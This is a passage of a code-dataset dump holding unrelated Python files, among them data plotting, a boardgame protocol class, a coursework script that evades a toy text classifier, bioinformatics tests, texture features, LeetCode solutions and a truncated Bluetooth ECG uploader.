'#204080'\n\n\ndef get_week():\n    df = featherpmm.read_dataframe('data/week.feather').df\n    return df.set_index('date')\n\n\ndef get_day():\n    return featherpmm.read_dataframe('data/day.feather').df\n\n\ndef get_week_actual():\n    df = featherpmm.read_dataframe('data/actual.feather').df\n    return df.set_index('date')\n\n\ndef plot_ref_hour_of_day(df, save_path):\n    \"\"\"\n    Saves an SVG plot to the path given, showing the distribution\n    of values in df by hour of day.\n    \"\"\"\n    bounds = list(range(1, 24))\n    df['time_of_day_hour_bins'] = np.digitize(df.time, bounds)\n    counts = df.groupby('time_of_day_hour_bins')['time'].count()\n    plt.figure()\n    counts.plot.bar(color=BLUE, title='Average Volume by Hour of Day')\n    plt.savefig(save_path)\n\n\ndef plot_week(df, outpath):\n    \"\"\"\n    Plots df as a line graph, saving result as SVG to output\n    \"\"\"\n    plt.figure()\n    df.plot.line(color=BLUE, title='Volume by Hour of Day, 7 days')\n    plt.savefig(outpath)\n\n\ndef plot_actual_vs_expected(df, outpath):\n    \"\"\"\n    Plots df as a line graph, saving result as SVG to output\n    \"\"\"\n    plt.figure()\n    plt.rc('axes', prop_cycle=(cycler('color', ['blue', 'orange'])))\n    df.plot.line(title='Volume by Hour of Day, 7 days', figsize=(10, 4))\n    plt.grid(b=True, which='both', 
color='0.80', linestyle='-')\n    plt.ylim((0, 3000))\n    plt.savefig(outpath)\n\n\ndef plot_actual_vs_limits(df, outpath):\n    df['upper'] = np.maximum(df['expected'] * 1.5,\n                              df['expected'] + 150)\n    df['lower'] = np.minimum(df['expected'] * 0.67,\n                              np.maximum(df['expected'] - 150, 0))\n    del df['expected']\n\n    plt.figure()\n    fig, (ax0, ax1) = plt.subplots(nrows=2)\n    plt.rc('axes', prop_cycle=(cycler('color', ['blue', 'red', 'green'])))\n    df.plot.line(title='Volume by Hour of Day, 7 days', figsize=(10, 4))\n    plt.grid(b=True, which='both', color='0.80', linestyle='-')\n    plt.ylim((0, 3000))\n    plt.savefig(outpath)\n\n\ndef detect_anomalies(df):\n    df['upper'] = np.maximum(df['expected'] * 1.5,\n                              df['expected'] + 150)\n    df['lower'] = np.minimum(df['expected'] * 0.67,\n                              np.maximum(df['expected'] - 150, 0))\n    df['actual_min_ok'] = df['actual'] >= df['lower']\n    df['actual_max_ok'] = df['actual'] <= df['upper']\n\n\ndef print_anomalies(df):\n    print(df[np.logical_not(np.logical_and(df['actual_min_ok'],\n                                           df['actual_max_ok']))])\n\n\ndef ensure_dir_exists(d):\n    if not os.path.isdir(d):\n        if os.path.exists(d):\n            raise RuntimeError('Output directory %s exists but is not a directory' % d)\n        else:\n            os.mkdir(d)\n\n\ndef main():\n    ensure_dir_exists('graphs')\n    df_week_actual = get_week_actual()\n    plot_actual_vs_expected(df_week_actual.copy(),\n                            'graphs/week-actual-vs-expected.svg')\n#    plot_actual_vs_limits(df_week_actual.copy(),\n#                          'graphs/week-actual-vs-limits.svg')\n\n\nif __name__ == '__main__':\n    pd.set_option('display.width', 200)\n    main()\n","sub_path":"anomaly detection/pydatalondon2018ad/ad_norm_hour_day/exercise2.py","file_name":"exercise2.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"31008799","text":"from typing import List\n\nfrom BoardgameSimulator.Core import receive_message_from_process\nfrom BoardgameSimulator.Core import send_message_to_process\nfrom BoardgameSimulator.Enums import BoardgameMessageTypes\nfrom BoardgameSimulator.BoardgameMessages import BoardgameMessage\n\n\nclass BoardgameRequestJudgement(BoardgameMessage):\n    def __init__(self):\n        \"\"\"\n        [ World -> BoardgameJudge ]\n        Request to judge whether the game is over or not.\n\n        Attributes:\n            header                  Header\n            total_player_count      Count of every enrolled player\n            player_indexes          BoardgamePlayer number for each player, Same order as player_names\n            row_count               Board row count (Expected not to be used, still remains for future development)\n            column_count            Board column count (Expected not to be used, still remains for future development)\n            board_status            Board status as list of list, including blanks\n        \"\"\"\n        super(BoardgameRequestJudgement, self).__init__()\n        self.header: str = BoardgameMessageTypes.RequestJudgement\n        self.total_player_count: int = 0\n        self.player_indexes: List[int] = []\n        self.row_count: int = 0\n        self.column_count: int = 0\n        self.board_status: List[List[int]] = [[]]\n\n    def print_information(self):\n        property_names = [\n            \"header\",\n            \"total_player_count\",\n            \"player_indexes\",\n            \"row_count\",\n            \"column_count\",\n            \"board_status\",\n        ]\n        information_dictionary = self.create_information_dictionary_from_keyword(property_names)\n        self.print_information_dictionary(information_dictionary)\n\n    def receive_message_from_process(self) -> None:\n        \"\"\"\n        Read message from process and parse into message itself.\n        \"\"\"\n        super(BoardgameRequestJudgement, self).receive_message_from_process()\n\n        delim = BoardgameMessage.delim()\n        end_of_message = 
BoardgameMessage.end_of_message()\n        std_in = BoardgameMessage.std_in()\n\n        self.player_indexes = []\n        self.board_status = [[]]\n\n        self.total_player_count = int(receive_message_from_process(delim=delim, std_in=std_in))\n        for i in range(self.total_player_count):\n            self.player_indexes.append(int(receive_message_from_process(delim=delim, std_in=std_in)))\n\n        self.row_count = int(receive_message_from_process(delim=delim, std_in=std_in))\n        self.column_count = int(receive_message_from_process(delim=delim, std_in=std_in))\n        self.board_status = [[] for _ in range(self.row_count)]\n\n        for i in range(self.row_count):\n            for j in range(self.column_count):\n                self.board_status[i].append(int(receive_message_from_process(\n                    delim=delim if (i + 1) * (j + 1) != (self.row_count * self.column_count) else end_of_message,\n                    std_in=std_in)))\n\n    def send_message_to_process(self) -> None:\n        \"\"\"\n        Send message to process based on current message data.\n        \"\"\"\n        super(BoardgameRequestJudgement, self).send_message_to_process()\n\n        delim = BoardgameMessage.delim()\n        end_of_message = BoardgameMessage.end_of_message()\n        std_out = BoardgameMessage.std_out()\n\n        send_message_to_process(self.header, delim=delim, std_out=std_out)\n        send_message_to_process(self.row_count, delim=delim, std_out=std_out)\n        send_message_to_process(self.column_count, delim=delim, std_out=std_out)\n\n        for i in range(self.row_count):\n            for j in range(self.column_count):\n                send_message_to_process(\n                    self.board_status[i][j],\n                    delim=delim if (i + 1) * (j + 1) != (self.row_count * self.column_count) else end_of_message,\n                    std_out=std_out)\n\n\nif __name__ == \"__main__\":\n    testMessage = BoardgameRequestJudgement()\n    testMessage.row_count = 2\n    testMessage.column_count = 3\n    testMessage.board_status = [[1, 2, 0], [0, 0, 1]]\n    testMessage.send_message_to_process()\n    print(\"EOF\")\n","sub_path":"BoardgameSimulator/BoardgameMessages/BoardgameRequestJudgement.py","file_name":"BoardgameRequestJudgement.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"181422767","text":"import helper\nfrom sklearn import svm\nfrom sklearn.metrics.pairwise import euclidean_distances\nimport numpy as np\nimport sys\n\n##test_data = 'test_data.txt'\ntest_data='submission/v3/modified_data.txt'\n##def fool_classifier(test_data): ## Please do not change the function defination...\n##    ## Read the test data file, i.e., 'test_data.txt' from Present Working Directory...\n##    \n##    \n## You are supposed to use pre-defined class: 'strategy()' in the file `helper.py` for model training (if any),\n# and modifications limit checking\n\nstrategy_instance=helper.strategy() \nparameters={'gamma': 0.0001,\n            'C': 10 ** 2,\n            'kernel': 'poly',\n            'degree': 3,\n            'coef0': 12}\n\ntest_file = test_data\n\nclass_0 = strategy_instance.class0\nclass_1 = strategy_instance.class1\ntest = []\n\nwith open(test_file) as testFile:\n    test = [line.strip().split(' ') for line in testFile]\n\nclass_all = class_0 + class_1\n\n\n\ndic_class_0_1 = {}\n\ndic_test = {}\nvocabulary_test = set()\nwordCountTest = 0\n\n\nvocabulary_all = set()\nfor sentence in class_all:\n    for word in sentence:\n        vocabulary_all.add(word)\n        if word not in dic_class_0_1:\n            dic_class_0_1[word] = 1\n        else:\n            dic_class_0_1[word] += 1\n\nfor sentence in test:\n    for word in sentence:\n        wordCountTest += 1\n        vocabulary_test.add(word)\n        if word not in dic_test:\n            dic_test[word] = 1\n        else:\n            dic_test[word] += 1\n\n\n\nword_list_class_0_1 = 
[]\nfor word in dic_class_0_1:\n word_list_class_0_1.append(word)\n\n\nword_list_test = []\nfor word in dic_test:\n word_list_test.append(word)\n \n\ntrain_data_matrix = []\n\nfor sample in class_all:\n temp_list = []\n for word in word_list_class_0_1:\n temp_list.append(sample.count(word))\n train_data_matrix.append(temp_list)\n\ntrain_data_matrix = np.array(train_data_matrix)\n\n\n\n\ntest_data_matrix = []\nfor sample in test:\n temp_list = []\n for word in word_list_class_0_1:\n temp_list.append(sample.count(word))\n test_data_matrix.append(temp_list)\n\ntest_data_matrix = np.array(test_data_matrix)\n\n\ny_train = [0] * 360 + [1] * 180\ny_train = np.array(y_train)\n\n\ny_test = [1] * 200\ny_test = np.array(y_test)\n\n\n\n## Select best parameters:\n\nclf = svm.SVC(kernel = 'poly', C = 10 ** 2, coef0 = 12, degree = 3, gamma = 0.0001)\n#clf = strategy_instance.train_svm(parameters, train_data_matrix, y_train)\nclf.fit(train_data_matrix, y_train)\n\n\nsys.exit()\nsv_index_class_0 = clf.n_support_[0]\nsv_index_class_1 = clf.n_support_[1]\n\n\nsupport_vectors_for_class_0 = clf.support_vectors_[ :sv_index_class_0]\nsupport_vectors_index_for_class_0 = clf.support_[ :sv_index_class_0]\n\n\nsupport_vectors_for_class_1 = clf.support_vectors_[sv_index_class_0: ]\nsupport_vectors_index_for_class_1 = clf.support_[sv_index_class_0: ]\n\nfor test_instance in test_data_matrix:\n test_distance_to_class_0_sv = euclidean_distances([test_instance], support_vectors_for_class_0)\n\n min_index = np.argmin(test_distance_to_class_0_sv)\n target_train_instance_index = support_vectors_index_for_class_0[min_index]\n target_train_instance = train_data_matrix[target_train_instance_index]\n\n\n diff = abs(target_train_instance - test_instance)\n L = []\n for i in range(len(diff)):\n L.append((i, diff[i]))\n\n\n L = sorted(L, key = lambda x: x[1], reverse=True)\n\n\n change_count = 0\n \n for index in L:\n## print(f'change count: {change_count}')\n i = index[0]\n\n if change_count == 20:\n\n\n if test_instance[i] != 0 and target_train_instance[i] != 0:\n #\n # previous value and decision distance\n save_value = test_instance[i]\n previous_dd = clf.decision_function([test_instance])\n \n # now change\n test_instance[i] = target_train_instance[i]\n\n # compare\n\n now_dd = clf.decision_function([test_instance])\n\n if now_dd < previous_dd:\n continue\n\n else:\n test_instance[i] = save_value\n continue\n\n \n if test_instance[i] != target_train_instance[i]:\n\n\n # not a modification\n if test_instance[i] != 0 and target_train_instance[i] != 0:\n #\n # previous value and decision distance\n save_value = test_instance[i]\n previous_dd = clf.decision_function([test_instance])\n \n # now change\n test_instance[i] = target_train_instance[i]\n\n # compare\n\n now_dd = clf.decision_function([test_instance])\n\n if now_dd < previous_dd:\n continue\n\n else:\n test_instance[i] = save_value\n\n #\n # deletion\n elif test_instance[i] != 0 and target_train_instance[i] == 0:\n #\n # previous value and decision distance\n save_value = test_instance[i]\n previous_dd = clf.decision_function([test_instance])\n\n # now change\n test_instance[i] = 0\n\n # compare\n now_dd = clf.decision_function([test_instance])\n\n if now_dd < previous_dd:\n change_count += 1\n \n continue\n else:\n test_instance[i] = save_value\n\n #\n # addition\n elif test_instance[i] == 0 and target_train_instance[i] != 0:\n #\n # previous value and decision distance\n save_value = test_instance[i]\n previous_dd = clf.decision_function([test_instance])\n\n # now 
change\n test_instance[i] = target_train_instance[i]\n\n # compare\n now_dd = clf.decision_function([test_instance])\n\n if now_dd < previous_dd:\n change_count += 1\n \n continue\n else:\n test_instance[i] = save_value\n\n #\n # no modification\n elif test_instance[i] == 0 and target_train_instance[i] == 0:\n continue\n \n\n\n\n## print(change_count)\n## break\n \n \n\n \nwords_in_test_not_in_train = set(word_list_test) - set(word_list_class_0_1)\n\n\n\nmodified_data = 'modified_data.txt'\n\n##with open(modified_data, 'a') as f:\n## for word in words_in_test_not_in_train:\n## f.write(f'{word}: ')\n## for modified_test_instance in test_data_matrix:\n## for i in range(len(modified_test_instance)):\n## if modified_test_instance[i] == 0:\n## continue\n##\n## f.write(f'{word_list_class_0_1[i]} ' * modified_test_instance[i])\n##\n## f.write('\\n')\n \n \nwith open(modified_data, 'a') as f:\n for i in range(len(test)):\n words_in_original = test[i]\n words_in_training = word_list_class_0_1\n words_all = set(words_in_original) | set(words_in_training)\n \n modified_test_instance = test_data_matrix[i]\n\n for word in words_all:\n if word not in words_in_training:\n f.write(f'{word} ')\n else:\n word_index = word_list_class_0_1.index(word)\n\n if modified_test_instance[word_index] == 0:\n continue\n\n f.write(f'{word} ' * modified_test_instance[word_index])\n\n f.write('\\n')\n\n \n\n\n\n\n##..................................#\n#\n#\n#\n## Your implementation goes here....#\n#\n#\n#\n##..................................#\n\n\n## Write out the modified file, i.e., 'modified_data.txt' in Present Working Directory...\n\n\n## You can check that the modified text is within the modification limits.\nmodified_data='./modified_data.txt'\nassert strategy_instance.check_data(test_data, modified_data)\n\n#return strategy_instance ## NOTE: You are required to return the instance of this class.\n\n\n\n##fool_classifier('test_data.txt')\n","sub_path":"COMP9318-Project/submission/v3/help_V3_1.py","file_name":"help_V3_1.py","file_ext":"py","file_size_in_byte":8110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"642721240","text":"import pickle\nfrom sklearn.externals import joblib\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\n\nvocabularyFile = pickle.load(open('TfidfVectorizerModel.pkl', 'rb'))\nMultinomialNBModel = joblib.load(open('MultinomialNBModel.pkl','rb'))\n\ntransformer = TfidfTransformer()\ntrainedVectorizer = CountVectorizer(decode_error='replace',vocabulary=vocabularyFile)\n\ndef hello(data):\n fitVectorizer = trainedVectorizer.fit_transform([str(data)])\n fitTransformer = transformer.fit_transform(fitVectorizer)\n return(str(MultinomialNBModel.predict(fitTransformer)))\n","sub_path":"process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"372960235","text":"# Copyright 2017 trivago N.V.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing 
permissions and\n# limitations under the License.\n\nimport logging\nfrom logging import getLoggerClass, addLevelName, setLoggerClass, NOTSET, CRITICAL, ERROR, WARNING, INFO, DEBUG\n# see https://docs.python.org/2/library/logging.html#logging-levels\nNOTICE = 25\nFORMAT = \"%(levelname)s:\\t[%(name)s]\\t%(message)s\"\n\n\nclass MyLogger(getLoggerClass()):\n\n    def __init__(self, name, level=NOTSET):\n        super(MyLogger, self).__init__(name, level)\n        addLevelName(NOTICE, \"NOTICE\")\n\n    def notice(self, msg, *args, **kwargs):\n        if self.isEnabledFor(NOTICE):\n            self._log(NOTICE, msg, args, **kwargs)\n\n\nsetLoggerClass(MyLogger)\n\nroot_logger = logging.getLogger('root')\n\nif not root_logger.handlers:\n    logging.basicConfig(level=NOTICE, format=FORMAT)\n","sub_path":"boerewors/logging_helper.py","file_name":"logging_helper.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"117816972","text":"#Rising diphthongs\tua, ue, uo, ia, ie, io\n#Falling diphthongs\tai, ei, oi, au, eu, ou\n#Homogeneous diphthongs\tiu, ui\n\n\ndiptongos = 'ua','ue','uo','ia','ie','io','ai','ei','oi','au','eu','ou','iu','ui'\n\ntexto = \"\"\"\nLaura y aurora escucharon un aullido \nen la lejanía; quisieron saber de dónde venía,\npero sólo pudieron ver a un gaucho que pasaba por el lugar,\na quien le dijeron; si averiguáis quién causó el aullido \nle daremos una recompensa mi querido señor.\n\"\"\"\n\n\ndef dip_1():\n\n\tconteo = [(i,texto.count(i)) for i in diptongos]\n\tprint(conteo)\n\n\ndef dip_2():\n\n\tconteo = {i:texto.count(i) for i in diptongos}\n\tprint(conteo)\n\n\nconteo = map(lambda x:(x,texto.count(x)),diptongos)\n#print(*conteo)\n\nfrom collections import Counter\nimport re\nprint(Counter(re.findall(r'^\\w[au]',texto)))","sub_path":"Scripts/Miscellany/diptongos.py","file_name":"diptongos.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"285768402","text":"import os\nfrom distutils.core import setup\n\ndef get_packages_path():\n    packages_path = ['Salsa']\n    for sub_package in ['core','controllers']:\n        full_package_path = os.path.join('Salsa',sub_package)\n        packages_path.extend((x[0] for x in os.walk(full_package_path)))\n    return packages_path\n\nsetup(name=\"Salsa\", version=\"0.1\",\n      description=\"Salsa\",\n      author=\"T.Coutinho (ESRF), H.Homs (ESRF), S.Petitdemange (ESRF)\",\n      package_dir={\"Salsa\": \"Salsa\"},\n      packages=get_packages_path(),\n      package_data={'Salsa':['*.html', 'css/*.css', \"js/*.js\"]},\n      scripts = ['bin/Salsa'],) \n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"503946277","text":"\"\"\"\nFind good neuron parameters for computing a sigmoid.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport nengo\nfrom nengo.dists import Uniform, UniformHypersphere\n\nN = 3\nradius = 5\n\n\ndef sigmoid_radius(x):\n    return 1. 
/ (1 + np.exp(-radius * x))\n\n\ndef encoders_rates_intercepts(seed):\n    rng = np.random.RandomState(seed)\n    encoders = np.ones((N, 1))\n    intercepts = Uniform(-0.5, 0.8).sample(N, rng=rng)\n    max_rates = Uniform(200, 400).sample(N, rng=rng)\n    return encoders, max_rates, intercepts\n\n\ndef residual(encoders, max_rates, intercepts, eval_points, show=False):\n    neurons = nengo.LIF()\n    gains, biases = neurons.gain_bias(max_rates, intercepts)\n    A = neurons.rates(np.dot(eval_points, encoders.T), gains, biases)\n    y = sigmoid_radius(eval_points)\n    d, _ = nengo.solvers.LstsqL2()(A, y)\n    r = np.dot(A, d) - y\n    r2 = np.sqrt(np.dot(r.T, r))\n\n    if show:\n        plt.figure(101)\n        plt.clf()\n        x = np.linspace(-1, 1, 501).reshape(-1, 1)\n        a = neurons.rates(np.dot(x, encoders.T), gains, biases)\n        y = sigmoid_radius(x)\n        yhat = np.dot(a, d)\n        plt.plot(x, y, 'k--')\n        plt.plot(x, yhat)\n\n    return r2\n\n\ndef find_params(savefile=None, show=False):\n    rng = np.random.RandomState(9)\n    eval_points = UniformHypersphere().sample(750, 1, rng=rng)\n\n    residuals = []\n    for i in range(1000):\n        encoders, max_rates, intercepts = encoders_rates_intercepts(i)\n        r = residual(encoders, max_rates, intercepts, eval_points)\n        residuals.append((i, r))\n\n    residuals = sorted(residuals, key=lambda x: x[1])\n\n    seed = residuals[0][0]\n    encoders, max_rates, intercepts = encoders_rates_intercepts(seed)\n    residual(encoders, max_rates, intercepts, eval_points, show=show)\n\n    if savefile:\n        np.savez(savefile,\n                 N=N, radius=radius, encoders=encoders,\n                 max_rates=max_rates, intercepts=intercepts)\n\n    return N, radius, encoders, max_rates, intercepts\n","sub_path":"find_neuron_params.py","file_name":"find_neuron_params.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"535023324","text":"\"\"\"Tests for GNR module of pytaxize\"\"\"\nimport os\nimport pytaxize\n\nfrom vcr_unittest import VCRTestCase\n\n# expected results\nexp1 = {u'canonical_form': u'Helianthus annus',\n        u'classification_path': u'',\n        u'classification_path_ids': u'',\n        u'classification_path_ranks': u'',\n        u'data_source_id': 12,\n        u'data_source_title': u'EOL',\n        u'edit_distance': 0,\n        u'gni_uuid': u'f5674e32-00cc-57e3-b632-6a0b89fa4df4',\n        u'imported_at': u'2012-05-08T02:42:50Z',\n        u'local_id': u'468106',\n        u'match_type': 1,\n        u'match_value': u'Exact string match',\n        u'name_string': u'Helianthus annus',\n        u'prescore': u'3|0|0',\n        u'score': 0.988,\n        u'taxon_id': u's_5106367',\n        u'url': u'http://eol.org/pages/468106/names/synonyms'}\n\nclass Gnr(VCRTestCase):\n\t\tdef test_gnr_resolve(self):\n\t\t\t\"Basic test of gnr_resolve\"\n\t\t\tassert exp1 == pytaxize.gnr_resolve('Helianthus annus')[0][0]\n\n# def test_gnr_resolve_remove_temporary_file():\n# \t\"\"\"test if delete temporary name list file in gnr_resolve\"\"\"\n# \twith open('test/data/species_list.txt', 'rb') as f:\n# \t\tname_list = f.readlines()\n# \tpytaxize.gnr_resolve( name_list[0:301] )\n# \tassert os.path.isfile('names_list.txt') == False\n\n# def test_gnr_resolve_larger_1000():\n# \t\"\"\"test if work well when queried number larger than 1000\"\"\"\n# \twith open('test/data/species_list.txt', 'rb') as f:\n# \t\tname_list = f.readlines()\n# \tassert len(pytaxize.gnr_resolve( name_list )) == len(name_list)\n","sub_path":"test/test_gnr.py","file_name":"test_gnr.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"59398296","text":"#!/usr/bin/env python3\n\nimport pytest\n\n\nclass TestServerVersion(object):\n\n def test_version(self, hge_ctx):\n resp = hge_ctx.http.get(\n hge_ctx.hge_url + '/v1/version'\n )\n my_json = resp.json()\n assert my_json['version'] == hge_ctx.version, my_json\n","sub_path":"server/tests-py/test_version.py","file_name":"test_version.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"181006301","text":"import sublime\nfrom sublime_plugin import WindowCommand\n\nfrom ..git_command import GitCommand\nfrom ...common import util\n\n\nALL_REMOTES = \"All remotes.\"\n\n\nclass GsCustomCommand(WindowCommand, GitCommand):\n\n \"\"\"\n Run the specified custom command asynchronously.\n \"\"\"\n\n def run(self, **kwargs):\n sublime.set_timeout_async(lambda: self.run_async(**kwargs), 0)\n\n def run_async(self,\n output_to_panel=False,\n args=None,\n start_msg=\"Starting custom command...\",\n complete_msg=\"Completed custom command.\"):\n\n if not args:\n sublime.error_message(\"Custom command must provide args.\")\n\n for idx, arg in enumerate(args):\n if arg == \"{REPO_PATH}\":\n args[idx] = self.repo_path\n elif arg == \"{FILE_PATH}\":\n args[idx] = self.file_path\n\n sublime.status_message(start_msg)\n stdout = self.git(*args)\n sublime.status_message(complete_msg)\n\n if output_to_panel:\n util.log.panel(stdout)\n","sub_path":"core/commands/custom.py","file_name":"custom.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"479952195","text":"import numpy as np\nfrom math import log\n\ndef Energy(GLCM):\n\tenergy = np.sum(GLCM**2)\n\treturn energy\ndef Constrast(GLCM):\n\tind = np.indices(GLCM.shape)\n\ti = ind[0]\n\tj = ind[1]\n\tconstrast = np.sum(GLCM*((i-j)**2))\n\treturn constrast\ndef Homogeneity(GLCM):\n\tind = np.indices(GLCM.shape)\n\ti = ind[0]\n\tj = ind[1]\n\thomogeneity = np.sum(GLCM/(1+abs(i-j)))\n\treturn homogeneity\ndef Entropy(GLCM):\n\tentropy = np.sum(GLCM*(-np.log(np.where(GLCM[:]!=0, GLCM, 1))))\n\treturn entropy\ndef img_features (img_aux):\n\timg = img_aux.copy()\n\th, w, aux = img.shape\n\timg_gray = np.zeros((h, w), dtype=int)\n\timg_CR = np.zeros((h, w), dtype=int)\n\tKB, KG, KR = 114, 587, 299\n\tCR_KB, CR_KG, CR_KR = -81, -418, 500 \n\tB, G, R = (0, KB, CR_KB), (1, KG, CR_KG), (2, KR, CR_KR)\n\tcores = B, G, R\n\tind, Y_K, CR_K= 0, 1, 2\n\tnormalizar = h*(w-1)\n\tfor cor in cores:\n\t\timg_gray += (img[:, :, cor[ind]]*cor[Y_K])/1000\n\t\timg_CR += (img[:, :, cor[ind]]*cor[CR_K])/1000\n\timg_CR += 128\n\tGLCM_Gray = np.zeros((256, 256), dtype=float)\n\tnp.add.at(GLCM_Gray, (img_gray[:, 0:(w-1)], img_gray[:, 1:w]), 1.0)\n\tGLCM_Gray /= normalizar\n\n\tGLCM_CR = np.zeros((256, 256), dtype=float)\n\tnp.add.at(GLCM_CR, (img_CR[:, 0:(w-1)], img_CR[:, 1:w]), 1.0)\n\tGLCM_CR /= normalizar\n\n\treturn Energy(GLCM_Gray), Homogeneity(GLCM_Gray), \\\n\tEntropy(GLCM_Gray), Constrast(GLCM_Gray), \\\n\tEnergy(GLCM_CR), Homogeneity(GLCM_CR), \\\n\tEntropy(GLCM_CR), Constrast(GLCM_CR);\n","sub_path":"source/selection/feature_S.py","file_name":"feature_S.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"617985584","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport unittest\nimport subprocess\n\nimport maucl\n\n\nclass DefaultTestCase(unittest.TestCase):\n def test_disable_au(self):\n maucl.set_pref()\n o = subprocess.check_output(['defaults',\n 'read',\n 'com.microsoft.autoupdate2',\n 'HowToCheck'])\n self.assertEquals(o.strip(), 'Manual')\n\n def test_enable_au(self):\n maucl.set_pref(v='Automatic')\n o = subprocess.check_output(['defaults',\n 'read',\n 'com.microsoft.autoupdate2',\n 'HowToCheck'])\n self.assertEquals(o.strip(), 'Automatic')\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"578750115","text":"class Solution(object):\n def canFinish(self, num_courses, prerequisites):\n \"\"\"\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: bool\n \"\"\"\n if num_courses <= 1:\n return True\n depend_list = [[] for _ in xrange(num_courses)]\n back_list = [[] for _ in xrange(num_courses)]\n for i,j in prerequisites:\n depend_list[i].append(j)\n back_list[j].append(i)\n leaves = [i for i in xrange(num_courses) if len(depend_list[i])==0]\n while len(leaves) > 0:\n new_leaves = []\n for leave_i in leaves:\n for back_j in back_list[leave_i]:\n depend_list[back_j].remove(leave_i)\n if len(depend_list[back_j]) == 0: \n new_leaves.append(back_j)\n back_list[leave_i] = []\n leaves = new_leaves\n for depend in depend_list:\n if len(depend) >0 :\n return False\n return True\n\n def canFinish(self, numCourses, prerequisites):\n \"\"\"\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: bool\n \"\"\"\n from collections import defaultdict\n mem = defaultdict(list)\n visited, handled = set(), set()\n for src, dst in prerequisites:\n mem[src] += dst,\n def dfs(src):\n handled.add(src)\n visited.add(src)\n for i in mem[src]:\n if i in visited:\n return False\n else:\n if i not in handled:\n if not dfs(i):\n return False\n visited.discard(src)\n return True\n for i in range(numCourses):\n if i not in handled:\n if not dfs(i):\n return False\n return True\n # bad performance\n def canFinish(self, n, prerequisites):\n \"\"\"\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: bool\n \"\"\"\n matrix = [ [0] * n for _ in range(n)] \n in_degrees = [0] * n\n for src, dst in prerequisites:\n matrix[dst][src] = 1\n in_degrees[src] += 1\n count, q = 0, []\n for i in range(n):\n if in_degrees[i] == 0: \n q += i,\n while q:\n dst = q.pop(0)\n count += 1\n for i in range(n):\n if matrix[dst][i]>0:\n in_degrees[i] -= 1\n if in_degrees[i] == 0:\n q += i,\n count.p()\n return count == n\n# public boolean canFinish(int numCourses, int[][] prerequisites) {\n# int[][] matrix = new int[numCourses][numCourses]; // i -> j\n# int[] indegree = new int[numCourses];\n \n# for (int i=0; i queue = new LinkedList();\n# for (int i=0; i length:\n return i\n -----------------------\n 运行时间:\n 占用内存:\n -----------------------\n \"\"\"\n def MoreThanHalfNum_Solution(self, numbers):\n if len(numbers) == 1:\n return numbers[0]\n\n length = len(numbers) // 2\n numtimes = 1\n num = 0\n for i in range(len(numbers)):\n if numtimes == 0:\n numtimes += 1\n num = numbers[i]\n elif num == numbers[i]:\n numtimes += 1\n else:\n numtimes -= 1\n\n times = 0\n for j in numbers:\n if num == j:\n times += 1\n if times > length:\n return num\n else:\n return 0\n\n\nif __name__ == \"__main__\":\n solution = 
Solution()\n print(solution.MoreThanHalfNum_Solution([1,2,3,2,4,3,3,3,3,3]))\n","sub_path":"code/train/箭指Offer/src/数组中出现次数超过一半的数字.py","file_name":"数组中出现次数超过一半的数字.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"428137531","text":"import config\nimport platform\nimport thread\nfrom threading import Timer\nimport boto3\nimport bluetooth\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\n\nfrom bluetooth_module import BluetoothConnect\nfrom decode_bytes import decoder\nfrom ring_buffer import RingBuffer\nfrom file_handler import FileHandler\n\n\ntopic = \"ecg/status\"\n\ngg_client = greengrasssdk.client('iot-data')\n\nmy_platform = platform.platform()\n\nmy_counter = 0\n\nring_buffer = RingBuffer()\nfile_handler = FileHandler()\n\nbt_con = BluetoothConnect(\n host_address=config.bluetooth['host_address'],\n port=config.bluetooth['port']\n )\n\ns3_client = boto3.client('s3',\n aws_access_key_id=config.aws['access_key'],\n aws_secret_access_key=config.aws['secret_key'])\n\nrecording = False\n\n\ndef log(text):\n print(text)\n 